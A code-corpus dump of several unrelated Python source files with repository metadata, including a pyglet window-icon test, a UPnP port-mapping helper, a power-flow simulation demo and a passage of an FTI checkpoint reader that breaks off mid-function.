] | 1 | 2016-07-19T16:56:46.000Z | 2016-07-19T16:56:46.000Z | tests/window/WINDOW_SET_ICON.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | 1 | 2018-08-27T22:31:16.000Z | 2018-08-27T22:31:16.000Z | tests/window/WINDOW_SET_ICON.py | theblacklion/pyglet | 5fd5c7d581e376946b7a94fac9582c09ad65bcd2 | [
"BSD-3-Clause"
] | 1 | 2019-09-06T03:05:35.000Z | 2019-09-06T03:05:35.000Z | #!/usr/bin/env python
'''Test that window icon can be set.
Expected behaviour:
One window will be opened. It will have an icon depicting a yellow
"A".
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: WINDOW_SET_MOUSE_CURSOR.py 717 2007-03-03 07:04:10Z Alex.Holkner $'
import unittest
from pyglet.gl import *
from pyglet import image
from pyglet import window
from pyglet.window import key
from os.path import join, dirname
icon_file = join(dirname(__file__), 'icon1.png')
if __name__ == '__main__':
unittest.main()
| 25.384615 | 87 | 0.674747 | #!/usr/bin/env python
'''Test that window icon can be set.
Expected behaviour:
One window will be opened. It will have an icon depicting a yellow
"A".
Close the window or press ESC to end the test.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: WINDOW_SET_MOUSE_CURSOR.py 717 2007-03-03 07:04:10Z Alex.Holkner $'
import unittest
from pyglet.gl import *
from pyglet import image
from pyglet import window
from pyglet.window import key
from os.path import join, dirname
icon_file = join(dirname(__file__), 'icon1.png')
class WINDOW_SET_ICON(unittest.TestCase):
def test_set_icon(self):
self.width, self.height = 200, 200
self.w = w = window.Window(self.width, self.height)
w.set_icon(image.load(icon_file))
glClearColor(1, 1, 1, 1)
while not w.has_exit:
glClear(GL_COLOR_BUFFER_BIT)
w.flip()
w.dispatch_events()
w.close()
if __name__ == '__main__':
unittest.main()
| 323 | 20 | 49 |
10a5a338a92a7f9288831f9283b572e927bc7fcb | 867 | py | Python | blender/arm/logicnode/object/LN_raycast_object.py | proteanblank/armory | edec5c2c3626cfc16065ccc5cf24e02f03187465 | [
"Zlib"
] | 2 | 2020-04-16T20:32:15.000Z | 2021-12-15T10:50:05.000Z | blender/arm/logicnode/object/LN_raycast_object.py | proteanblank/armory | edec5c2c3626cfc16065ccc5cf24e02f03187465 | [
"Zlib"
] | 1 | 2020-09-13T09:34:57.000Z | 2020-09-13T09:34:57.000Z | blender/arm/logicnode/object/LN_raycast_object.py | proteanblank/armory | edec5c2c3626cfc16065ccc5cf24e02f03187465 | [
"Zlib"
] | 1 | 2019-09-24T14:25:35.000Z | 2019-09-24T14:25:35.000Z | from arm.logicnode.arm_nodes import *
class RaycastObjectNode(ArmLogicTreeNode):
"""it takes an object and returns true or false if the object is touched at screen (x, y) and the (x,y, z) position of that touch if returned"""
bl_idname = 'LNRaycastObjectNode'
bl_label = 'Raycast Object'
arm_section = 'props'
arm_version = 1
| 39.409091 | 148 | 0.675894 | from arm.logicnode.arm_nodes import *
class RaycastObjectNode(ArmLogicTreeNode):
"""it takes an object and returns true or false if the object is touched at screen (x, y) and the (x,y, z) position of that touch if returned"""
bl_idname = 'LNRaycastObjectNode'
bl_label = 'Raycast Object'
arm_section = 'props'
arm_version = 1
def arm_init(self, context):
self.add_input('ArmNodeSocketAction', 'In')
self.add_input('ArmNodeSocketObject', 'Object')
self.add_input('ArmFloatSocket', 'X')
self.add_input('ArmFloatSocket', 'Y')
self.add_input('ArmNodeSocketObject', 'Camera')
self.add_output('ArmNodeSocketAction', 'Out')
self.add_output('ArmNodeSocketAction', 'True')
self.add_output('ArmNodeSocketAction', 'False')
self.add_output('ArmVectorSocket', 'Location')
| 492 | 0 | 27 |
d299f91d21993de099da6d5c3ffc6a6c7b0fdbe5 | 3,824 | py | Python | upnpc/client.py | hamsteruser/upnpc_py | c2409ad262ea1fa48c847837d8141bd1851af193 | [
"MIT"
] | null | null | null | upnpc/client.py | hamsteruser/upnpc_py | c2409ad262ea1fa48c847837d8141bd1851af193 | [
"MIT"
] | null | null | null | upnpc/client.py | hamsteruser/upnpc_py | c2409ad262ea1fa48c847837d8141bd1851af193 | [
"MIT"
] | null | null | null | import miniupnpc
import random
import itertools
import ipaddress
if __name__ == "__main__":
pm = port_manager()
print(pm.discover())
(result, port) = pm.mapport()
print(result, port)
print(pm.used_ports())
print(pm.unmapport(int(port)))
print(pm.used_ports())
print(pm.unmap_ports(closeall=True))
| 35.082569 | 119 | 0.558316 | import miniupnpc
import random
import itertools
import ipaddress
class port_manager():
def __init__(self):
''' initialize a uPnP '''
try:
self.upnp = miniupnpc.UPnP()
self.discover()
except Exception as err:
print(err)
raise ValueError("uPnP is not running or not properly responding ")
self.available_ports = [int(i) for i in range(1024, 65536, 1)]
self.port_tuples = []
def port_ban(self, port):
''' remove port from available list '''
if port in self.available_ports:
self.available_ports.pop(self.available_ports.index(port))
def discover(self) -> Exception:
''' checking uPnP workness '''
devices = self.upnp.discover()
self.upnp.selectigd()
ipaddress.ip_address(self.upnp.lanaddr)
ext_ip = self.upnp.externalipaddress()
return ((devices, ext_ip))
def used_ports(self) -> None:
''' uPnP used ports '''
for i in itertools.count(start=0):
result = self.upnp.getgenericportmapping(i)
if result == None:
break
print(f"Used port: {result}")
(port, proto, (internal_host, internal_port), desc, c, d, timelife) = result
self.port_tuples.append((internal_host, port))
self.port_ban(port)
def unmap_allports(self) -> None:
while True:
result = self.upnp.getgenericportmapping(0)
if result == None:
break
print(f"Close the: {result}")
(port, proto, (internal_host, internal_port), desc, c, d, timelife) = result
self.unmapport(port=port, proto=proto)
if int(port) not in self.available_ports:
self.available_ports.append(int(port))
def mapport(self, port=None, proto="TCP", tries=20) -> tuple((bool, str)):
''' mapping port is argument or random choice from the self.available_ports '''
self.used_ports()
if port:
_port = port
if _port not in self.available_ports:
for port_tuple in self.port_tuples:
if port_tuple[1] == _port and self.upnp.lanaddr != port_tuple[0]:
self.unmapport(_port)
try:
result = self.upnp.addportmapping(int(_port), proto, self.upnp.lanaddr, int(_port), str(_port), '')
except Exception as err:
result = False
print(f"Mapping is unsuccessful. Tried port: {_port}")
_port = "-1"
else:
for i in range(tries):
_port = random.choice(self.available_ports)
try:
result = self.upnp.addportmapping(int(_port), proto, self.upnp.lanaddr, int(_port), str(_port), '')
break
except Exception as err:
self.port_ban(_port)
result = False
print(f"Mapping is unsuccessful. Tried port: {_port}")
_port = "-1"
self.port_ban(_port)
return ((result, str(_port)))
def unmapport(self, port: int, proto="TCP") -> bool:
''' unmapping port '''
try:
result = self.upnp.deleteportmapping(int(port), proto)
except Exception as err:
result = False
finally:
if int(port) not in self.available_ports:
self.available_ports.append(int(port))
return ((result))
if __name__ == "__main__":
pm = port_manager()
print(pm.discover())
(result, port) = pm.mapport()
print(result, port)
print(pm.used_ports())
print(pm.unmapport(int(port)))
print(pm.used_ports())
print(pm.unmap_ports(closeall=True))
| 432 | 3,038 | 23 |
6ec87ca6e40ae1af7ac430c629c1de5301101e79 | 315 | py | Python | mysite/article/views.py | ismailtimo29/e-olymp-clone | 900b8eb596d893642b493c12c09e248d86d72a85 | [
"Unlicense"
] | 1 | 2021-03-03T22:25:23.000Z | 2021-03-03T22:25:23.000Z | mysite/article/views.py | akhadov11/e-olymp-clone | 900b8eb596d893642b493c12c09e248d86d72a85 | [
"Unlicense"
] | null | null | null | mysite/article/views.py | akhadov11/e-olymp-clone | 900b8eb596d893642b493c12c09e248d86d72a85 | [
"Unlicense"
] | null | null | null | from django.shortcuts import render
from rest_framework import viewsets
from .models import Item
from .serializers import ItemSerializer
| 26.25 | 57 | 0.8 | from django.shortcuts import render
from rest_framework import viewsets
from .models import Item
from .serializers import ItemSerializer
class ItemViewSet(viewsets.ModelViewSet, ItemSerializer):
permission_classes = []
serializer_class = ItemSerializer
queryset = Item.objects.order_by('-post_time')
| 0 | 153 | 23 |
22d8500af8da68aaa57954193c1fa5124901be5b | 408 | py | Python | plugins/dbnd-tensorflow/src/dbnd_tensorflow/marshalling/tensorflow_values.py | busunkim96/dbnd | 0191fdcd4c4fbd35006f1026d1a55b2abab9097b | [
"Apache-2.0"
] | 224 | 2020-01-02T10:46:37.000Z | 2022-03-02T13:54:08.000Z | plugins/dbnd-tensorflow/src/dbnd_tensorflow/marshalling/tensorflow_values.py | busunkim96/dbnd | 0191fdcd4c4fbd35006f1026d1a55b2abab9097b | [
"Apache-2.0"
] | 16 | 2020-03-11T09:37:58.000Z | 2022-01-26T10:22:08.000Z | plugins/dbnd-tensorflow/src/dbnd_tensorflow/marshalling/tensorflow_values.py | busunkim96/dbnd | 0191fdcd4c4fbd35006f1026d1a55b2abab9097b | [
"Apache-2.0"
] | 24 | 2020-03-24T13:53:50.000Z | 2022-03-22T11:55:18.000Z | from tensorflow.keras import models
from tensorflow.keras.callbacks import History
from targets.values.builtins_values import DataValueType
| 24 | 56 | 0.781863 | from tensorflow.keras import models
from tensorflow.keras.callbacks import History
from targets.values.builtins_values import DataValueType
class TensorflowModelValueType(DataValueType):
type = models.Model
type_str = "Model"
config_name = "tensorflow_model"
class TensorflowHistoryValueType(DataValueType):
type = History
type_str = "History"
config_name = "tensorflow_history"
| 0 | 219 | 46 |
86b06fba764b1a4406ad0f6948dbaa2789f40664 | 8,989 | py | Python | python/stepspy-current/demo/demo_powerflow.py | changgang/steps | 9b8ea474581885129d1c1a1c3ad40bc8058a7e0a | [
"MIT"
] | 29 | 2019-10-30T07:04:10.000Z | 2022-02-22T06:34:32.000Z | python/stepspy-current/demo/demo_powerflow.py | cuihantao/steps | 60327bf42299cb7117ed5907a931583d7cdf590d | [
"MIT"
] | 1 | 2021-09-25T15:29:59.000Z | 2022-01-05T14:04:18.000Z | python/stepspy-current/demo/demo_powerflow.py | changgang/steps | 9b8ea474581885129d1c1a1c3ad40bc8058a7e0a | [
"MIT"
] | 8 | 2019-12-20T16:13:46.000Z | 2022-03-20T14:58:23.000Z | #coding = utf-8
'''
Here is a demo of showing how to slove powerflow with stepspy.
Changgang Li, 2019/08/25
'''
from stepspy import STEPS # import the class 'STEPS'
simulator = STEPS(is_default=True) # create a STEPS simulator instance
simulator.info()
powerflow_data_file = 'IEEE9.raw' # file name of powerflow data. Use absolute path if necessary
powerflow_data_type = 'PSS/E' # powerflow data type. Currently, use 'PSS/E' only
simulator.load_powerflow_data(powerflow_data_file, powerflow_data_type) # load powerflow data into the simulator
data_type = 'D' # if you want to set or get doubule data, set data_type as 'F' or 'D'.
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW' # the data name in the powerflow solver of the simulator
# the data_type and data_name should be consistent. make sure the data_type is correct.
# If the data is double, use 'F' or 'D'. If the data is integer, use 'I'. If the data is boolean, use 'B'. If the data is string, use 'S'
'''
(1) when data_type is 'D' or 'F' you can set/get the following data
'MAX ACTIVE POWER IMBALANCE IN MW': maximum allowed active power mismatch at each bus, in MW. This is the powerflow convergence threshold of P equations.
'MAX REACTIVE POWER IMBALANCE IN MVAR': maximum allowed reactive power mismatch at each bus, in MVar. This is the powerflow convergence threshold of Q equations.
'ITERATION ACCELERATOR': acceleration factor for iteration. by default it is 1.0. if >1.0, then the powerflow solver is accelerated. if <1.0, the powerflow solver is decellerated.
(2) when data_type is 'I', you can set/get the following data
'MAX ITERATION': maximum iteration count allowed for solving powerflow. If set as 1, you can get the solution step by step.
(3)when data_type is 'B', you can set/get the following data
'FLAT START LOGIC': if true, powerflow will be solved with unity voltage profile (1.0pu, 0.0deg), if false, poewrflow will be solved from the current voltage profile.
'''
# here goes get and set maximum active power imbalance in MW
data_type = 'D'
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW'
P_error_MW = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum reactive power imbalance in MVAR
data_type = 'D'
data_name = 'MAX REACTIVE POWER IMBALANCE IN MVAR'
Q_error_MVar = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum iteration
data_type = 'I'
data_name = 'MAX ITERATION'
Iter_max = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 50
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set flat start logic
data_type = 'B'
data_name = 'FLAT START LOGIC'
flat_flag = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# now assuming that maximum active and reactive power imbalance are already set.
# show how to solve powerflow
# solve powerflow with flat start logic disabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # use 'NR' for Newton-Raphson solution, use 'PQ' for PQ decoupled solution
# solve powerflow with flat start logic enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('PQ')
# if you want to solve powerflow step by step to get the solution process,
# you can set MAX ITERATION as 1, and Flat start logic as false
data_type = 'I'
data_name = 'MAX ITERATION'
value = 1
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # first slove it with flat start enable
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value) # from now on, disable flat start
while not simulator.is_powerflow_converged(): # use is_powerflow_converged() to check if powerflow is converged
simulator.solve_powerflow('NR')
simulator.save_jacobian_matrix('jacobian.txt') # if you are solving with NR method, you can get jacobian matrix of each iteration in the file
# once powerflow is converged, you can export powerflow result to file
powerflow_result_file = 'pf_result.txt'
simulator.save_powerflow_result(powerflow_result_file) # you can check the file's contents
# you can get power loss of a solved powerflow case
ploss_MW = simulator.get_powerflow_loss() # in MW
print('Loss is:', ploss_MW)
# if you want to get the voltage of each bus, you can try the following codes
buses = simulator.get_all_buses()
for bus in buses:
bus_name = simulator.get_bus_data(bus, 'S', 'Name')
voltage = simulator.get_bus_data(bus, 'D', 'Voltage in PU')
angle = simulator.get_bus_data(bus, 'D', 'Angle in deg')
print(bus, bus_name, voltage, angle)
# if you want to get the generation of each generator, you can try the following codes
generators = simulator.get_generators_at_bus(0) # 0 indicate all generators will be returned
for generator in generators:
P = simulator.get_generator_data(generator, 'D', 'PGEN_MW')
Q = simulator.get_generator_data(generator, 'D', 'QGEN_MVAR')
print(generator, P, Q)
# if you want to get the load of each load, you can try the following codes
loads = simulator.get_loads_at_bus(0) # 0 indicate all loads will be returned
for load in loads:
P = simulator.get_load_data(load, 'D', 'P_MW')
Q = simulator.get_load_data(load, 'D', 'Q_MVAR')
print(load, P, Q)
# if you want to get the power of each line, you can try the following codes
lines = simulator.get_lines_at_bus(0) # 0 indicate all lines will be returned
for line in lines:
bus_send = simulator.get_line_data(line, 'I', 'BUS_SEND') # get the bus number of sending side
bus_recv = simulator.get_line_data(line, 'I', 'BUS_RECV') # get the bus number of receiving side
Psend = simulator.get_line_data(line, 'D', 'PSEND_MW') # active power at sending side
Qsend = simulator.get_line_data(line, 'D', 'QSEND_MVAR') # reactive power at sending side
Precv = simulator.get_line_data(line, 'D', 'PRECV_MW') # active power at receiving side
Qrecv = simulator.get_line_data(line, 'D', 'QRECV_MVAR') # reactive power at receiving side
print(line, bus_send, (Psend, Qsend), bus_recv, (Precv, Qrecv))
# if you want to get the power of each transformer, you can try the following codes
transformers = simulator.get_transformers_at_bus(0) # 0 indicate all transformers will be returned
for transformer in transformers:
bus_pri = simulator.get_transformer_data(transformer, 'I', 'Primary', 'BUS') # get the bus number of primary side
bus_sec = simulator.get_transformer_data(transformer, 'I', 'Secondary', 'BUS') # get the bus number of secondary side
P_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'P_MW') # active power at primary side
Q_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'Q_MVAR') # reactive power at primary side
P_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'P_MW') # active power at secondary side
Q_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'Q_MVAR') # reactive power at secondary side
print(transformer, bus_pri, (P_pri, Q_pri), bus_sec, (P_sec, Q_sec))
# if you want to change generation of each generaor, trye the following codes
generator = (2,'1') # generator bus, and generator ID, check generator line of raw file
simulator.set_generator_data(generator, 'D', 'PGEN_MW', 50.0) # remember, only P of generator at bus of type 2 can be changed
data_type = 'I'
data_name = 'MAX ITERATION'
value = 10
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR')
newfile = "IEEE9.new.raw"
file_type = "PSS/E"
export_mode = 0 # keep as original
export_mode = 1 # order with bus number
export_mode = 2 # order with bus name
export_mode = 3 # order for dynamic simulation
simulator.save_powerflow_data(newfile, file_type, export_mode)
simulator.build_network_Y_matrix()
simulator.save_network_Y_matrix('ymatrix_pf.csv')
simulator.build_decoupled_network_B_matrix()
simulator.save_decoupled_network_B_matrix('bmatrix_pf.csv')
simulator.build_dc_network_B_matrix()
simulator.save_dc_network_B_matrix('bmatrix_dc_pf.csv')
simulator.build_network_Z_matrix()
simulator.save_network_Z_matrix('zmatrix_pf.csv') | 45.39899 | 180 | 0.766047 | #coding = utf-8
'''
Here is a demo of showing how to slove powerflow with stepspy.
Changgang Li, 2019/08/25
'''
from stepspy import STEPS # import the class 'STEPS'
simulator = STEPS(is_default=True) # create a STEPS simulator instance
simulator.info()
powerflow_data_file = 'IEEE9.raw' # file name of powerflow data. Use absolute path if necessary
powerflow_data_type = 'PSS/E' # powerflow data type. Currently, use 'PSS/E' only
simulator.load_powerflow_data(powerflow_data_file, powerflow_data_type) # load powerflow data into the simulator
data_type = 'D' # if you want to set or get doubule data, set data_type as 'F' or 'D'.
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW' # the data name in the powerflow solver of the simulator
# the data_type and data_name should be consistent. make sure the data_type is correct.
# If the data is double, use 'F' or 'D'. If the data is integer, use 'I'. If the data is boolean, use 'B'. If the data is string, use 'S'
'''
(1) when data_type is 'D' or 'F' you can set/get the following data
'MAX ACTIVE POWER IMBALANCE IN MW': maximum allowed active power mismatch at each bus, in MW. This is the powerflow convergence threshold of P equations.
'MAX REACTIVE POWER IMBALANCE IN MVAR': maximum allowed reactive power mismatch at each bus, in MVar. This is the powerflow convergence threshold of Q equations.
'ITERATION ACCELERATOR': acceleration factor for iteration. by default it is 1.0. if >1.0, then the powerflow solver is accelerated. if <1.0, the powerflow solver is decellerated.
(2) when data_type is 'I', you can set/get the following data
'MAX ITERATION': maximum iteration count allowed for solving powerflow. If set as 1, you can get the solution step by step.
(3)when data_type is 'B', you can set/get the following data
'FLAT START LOGIC': if true, powerflow will be solved with unity voltage profile (1.0pu, 0.0deg), if false, poewrflow will be solved from the current voltage profile.
'''
# here goes get and set maximum active power imbalance in MW
data_type = 'D'
data_name = 'MAX ACTIVE POWER IMBALANCE IN MW'
P_error_MW = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum reactive power imbalance in MVAR
data_type = 'D'
data_name = 'MAX REACTIVE POWER IMBALANCE IN MVAR'
Q_error_MVar = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 0.001
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set maximum iteration
data_type = 'I'
data_name = 'MAX ITERATION'
Iter_max = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = 50
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# here goes get and set flat start logic
data_type = 'B'
data_name = 'FLAT START LOGIC'
flat_flag = simulator.get_powerflow_solver_parameter(data_type, data_name)
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
# now assuming that maximum active and reactive power imbalance are already set.
# show how to solve powerflow
# solve powerflow with flat start logic disabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # use 'NR' for Newton-Raphson solution, use 'PQ' for PQ decoupled solution
# solve powerflow with flat start logic enabled
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('PQ')
# if you want to solve powerflow step by step to get the solution process,
# you can set MAX ITERATION as 1, and Flat start logic as false
data_type = 'I'
data_name = 'MAX ITERATION'
value = 1
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR') # first slove it with flat start enable
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = False
simulator.set_powerflow_solver_parameter(data_type, data_name, value) # from now on, disable flat start
while not simulator.is_powerflow_converged(): # use is_powerflow_converged() to check if powerflow is converged
simulator.solve_powerflow('NR')
simulator.save_jacobian_matrix('jacobian.txt') # if you are solving with NR method, you can get jacobian matrix of each iteration in the file
# once powerflow is converged, you can export powerflow result to file
powerflow_result_file = 'pf_result.txt'
simulator.save_powerflow_result(powerflow_result_file) # you can check the file's contents
# you can get power loss of a solved powerflow case
ploss_MW = simulator.get_powerflow_loss() # in MW
print('Loss is:', ploss_MW)
# if you want to get the voltage of each bus, you can try the following codes
buses = simulator.get_all_buses()
for bus in buses:
bus_name = simulator.get_bus_data(bus, 'S', 'Name')
voltage = simulator.get_bus_data(bus, 'D', 'Voltage in PU')
angle = simulator.get_bus_data(bus, 'D', 'Angle in deg')
print(bus, bus_name, voltage, angle)
# if you want to get the generation of each generator, you can try the following codes
generators = simulator.get_generators_at_bus(0) # 0 indicate all generators will be returned
for generator in generators:
P = simulator.get_generator_data(generator, 'D', 'PGEN_MW')
Q = simulator.get_generator_data(generator, 'D', 'QGEN_MVAR')
print(generator, P, Q)
# if you want to get the load of each load, you can try the following codes
loads = simulator.get_loads_at_bus(0) # 0 indicate all loads will be returned
for load in loads:
P = simulator.get_load_data(load, 'D', 'P_MW')
Q = simulator.get_load_data(load, 'D', 'Q_MVAR')
print(load, P, Q)
# if you want to get the power of each line, you can try the following codes
lines = simulator.get_lines_at_bus(0) # 0 indicate all lines will be returned
for line in lines:
bus_send = simulator.get_line_data(line, 'I', 'BUS_SEND') # get the bus number of sending side
bus_recv = simulator.get_line_data(line, 'I', 'BUS_RECV') # get the bus number of receiving side
Psend = simulator.get_line_data(line, 'D', 'PSEND_MW') # active power at sending side
Qsend = simulator.get_line_data(line, 'D', 'QSEND_MVAR') # reactive power at sending side
Precv = simulator.get_line_data(line, 'D', 'PRECV_MW') # active power at receiving side
Qrecv = simulator.get_line_data(line, 'D', 'QRECV_MVAR') # reactive power at receiving side
print(line, bus_send, (Psend, Qsend), bus_recv, (Precv, Qrecv))
# if you want to get the power of each transformer, you can try the following codes
transformers = simulator.get_transformers_at_bus(0) # 0 indicate all transformers will be returned
for transformer in transformers:
bus_pri = simulator.get_transformer_data(transformer, 'I', 'Primary', 'BUS') # get the bus number of primary side
bus_sec = simulator.get_transformer_data(transformer, 'I', 'Secondary', 'BUS') # get the bus number of secondary side
P_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'P_MW') # active power at primary side
Q_pri = simulator.get_transformer_data(transformer, 'D', 'Primary', 'Q_MVAR') # reactive power at primary side
P_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'P_MW') # active power at secondary side
Q_sec = simulator.get_transformer_data(transformer, 'D', 'Secondary', 'Q_MVAR') # reactive power at secondary side
print(transformer, bus_pri, (P_pri, Q_pri), bus_sec, (P_sec, Q_sec))
# if you want to change generation of each generaor, trye the following codes
generator = (2,'1') # generator bus, and generator ID, check generator line of raw file
simulator.set_generator_data(generator, 'D', 'PGEN_MW', 50.0) # remember, only P of generator at bus of type 2 can be changed
data_type = 'I'
data_name = 'MAX ITERATION'
value = 10
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
data_type = 'B'
data_name = 'FLAT START LOGIC'
value = True
simulator.set_powerflow_solver_parameter(data_type, data_name, value)
simulator.solve_powerflow('NR')
newfile = "IEEE9.new.raw"
file_type = "PSS/E"
export_mode = 0 # keep as original
export_mode = 1 # order with bus number
export_mode = 2 # order with bus name
export_mode = 3 # order for dynamic simulation
simulator.save_powerflow_data(newfile, file_type, export_mode)
simulator.build_network_Y_matrix()
simulator.save_network_Y_matrix('ymatrix_pf.csv')
simulator.build_decoupled_network_B_matrix()
simulator.save_decoupled_network_B_matrix('bmatrix_pf.csv')
simulator.build_dc_network_B_matrix()
simulator.save_dc_network_B_matrix('bmatrix_dc_pf.csv')
simulator.build_network_Z_matrix()
simulator.save_network_Z_matrix('zmatrix_pf.csv') | 0 | 0 | 0 |
c62690b142f347c026178eead428488587719c22 | 9,918 | py | Python | scripts/ckpt_processor/read_fti_ckpts.py | Knoxort/fti | c784a535aae17ec4df28d025b1d589bd6a71948d | [
"BSD-3-Clause"
] | 34 | 2015-03-16T03:04:37.000Z | 2022-02-28T19:59:57.000Z | scripts/ckpt_processor/read_fti_ckpts.py | Knoxort/fti | c784a535aae17ec4df28d025b1d589bd6a71948d | [
"BSD-3-Clause"
] | 155 | 2015-12-07T23:12:16.000Z | 2022-01-15T19:14:34.000Z | scripts/ckpt_processor/read_fti_ckpts.py | Knoxort/fti | c784a535aae17ec4df28d025b1d589bd6a71948d | [
"BSD-3-Clause"
] | 29 | 2015-03-20T02:16:35.000Z | 2021-11-11T16:10:17.000Z | # This module initiates the checkpoint
# processing of FTI files.
import os
import glob
import os.path
import time
from fnmatch import fnmatch
import configparser
import posix_read_ckpts
import subprocess
import sys
# variables used for input validation
fti_levels = (1, 2, 3, 4)
output_formats = ('CSV', 'HDF5', 'data')
# runtime variables of FTI (ckpt and meta)
config_file = ""
ckpt_dir = ""
meta_dir = ""
global_dir = ""
group_size = 0
nbHeads = 0
nodeSize = 0
totalRanks = 0
ioMode = 0
ckpt_abs_path = ""
meta_abs_path = ""
execution_id = ""
level_meta_dir = ""
level_dir = ""
# This function reads the config_file
# and sets FTI parameters
# This function processes FTI's files
# given config_file and set the absolute
# paths of meta files and ckpt files
# This function returns the path of the
# ckpt corresponding to rank_id
# This function is called if io=2 and level=4
# it recovers the file from l4 directory in mpiio format
# to tmp/file in posix format
# This function returns the path of the
# meta corresponding to the ckpt_file
# note: for now it works with level 1
# This function sets FTI's files paths
# depending on the level where the ckpt is stored
# This function compares ckpt directories
# and returns the level to which the last ckpt was stored
# API to read the checkpoints given config and rank
# def read_checkpoints(config_file, rank_id, level=None, output=None):
| 31.993548 | 109 | 0.619681 | # This module initiates the checkpoint
# processing of FTI files.
import os
import glob
import os.path
import time
from fnmatch import fnmatch
import configparser
import posix_read_ckpts
import subprocess
import sys
# variables used for input validation
fti_levels = (1, 2, 3, 4)
output_formats = ('CSV', 'HDF5', 'data')
# runtime variables of FTI (ckpt and meta)
config_file = ""
ckpt_dir = ""
meta_dir = ""
global_dir = ""
group_size = 0
nbHeads = 0
nodeSize = 0
totalRanks = 0
ioMode = 0
ckpt_abs_path = ""
meta_abs_path = ""
execution_id = ""
level_meta_dir = ""
level_dir = ""
# This function reads the config_file
# and sets FTI parameters
def init_config_params(config_file):
global execution_id
global ckpt_dir
global meta_dir
global global_dir
global group_size
global nbHeads
global nodeSize
global ioMode
if os.path.isfile(config_file) is False:
print("Configuration file not found")
sys.exit(2001)
else:
config = configparser.ConfigParser()
config.read(config_file)
execution_id = config['restart']['exec_id']
ckpt_dir = config['basic']['ckpt_dir']
meta_dir = config['basic']['meta_dir']
global_dir = config['basic']['glbl_dir']
group_size = config['basic']['group_size']
nbHeads = config['basic']['head']
nodeSize = config['basic']['node_size']
ioMode = config['basic']['ckpt_io']
# This function processes FTI's files
# given config_file and set the absolute
# paths of meta files and ckpt files
def process_fti_paths(config_file):
global ckpt_dir
global meta_dir
global ckpt_abs_path
global meta_abs_path
# ckpt dir
dir_path = os.path.dirname(os.path.realpath(config_file))
# concatenate paths
if level_dir == '/l4/':
# switch to global_dir
ckpt_dir = global_dir
if ckpt_dir.startswith('./') is True: # same directory as config
ckpt_abs_path = dir_path + ckpt_dir.replace('.', '')
elif "." not in ckpt_dir: # absolute path
# set dir
ckpt_abs_path = ckpt_dir
else: # relative path
# iterate over the number of '../' found in ckpt_path
os.chdir(dir_path)
dirs = ckpt_dir.count("..")
for i in range(dirs):
os.chdir("..")
# concatenate the remaining part
for i in range(dirs):
# remove ../
ckpt_dir = ckpt_dir.replace('../', '')
os.chdir(ckpt_dir)
ckpt_abs_path = os.getcwd()
print("ckpt_abs_path ", ckpt_abs_path)
# meta dir
dir_path = os.path.dirname(os.path.realpath(config_file))
print(dir_path)
# concatenate paths
if meta_dir.startswith('./') is True: # same directory as config
# omit dot + concatenate the rest of the path
meta_abs_path = dir_path + meta_dir.replace('.', '')
elif "." not in meta_dir: # absolute path
# set dir
meta_abs_path = meta_dir
else: # relative path
# iterate over the number of '../' found in ckpt_path
os.chdir(dir_path)
dirs = meta_dir.count("..")
for i in range(dirs):
os.chdir("..")
# concatenate the remaining part
for i in range(dirs):
# remove ../
meta_dir = meta_dir.replace('../', '')
os.chdir(meta_dir)
meta_abs_path = os.getcwd()
print("meta_abs_path ", meta_abs_path)
# This function returns the path of the
# ckpt corresponding to rank_id
def find_ckpt_file(rank_id):
pattern_ckpt_file = ""
pattern_ckpt_path = execution_id+level_dir
if level_dir == '/l1/' or level_dir == '/l4/': # local
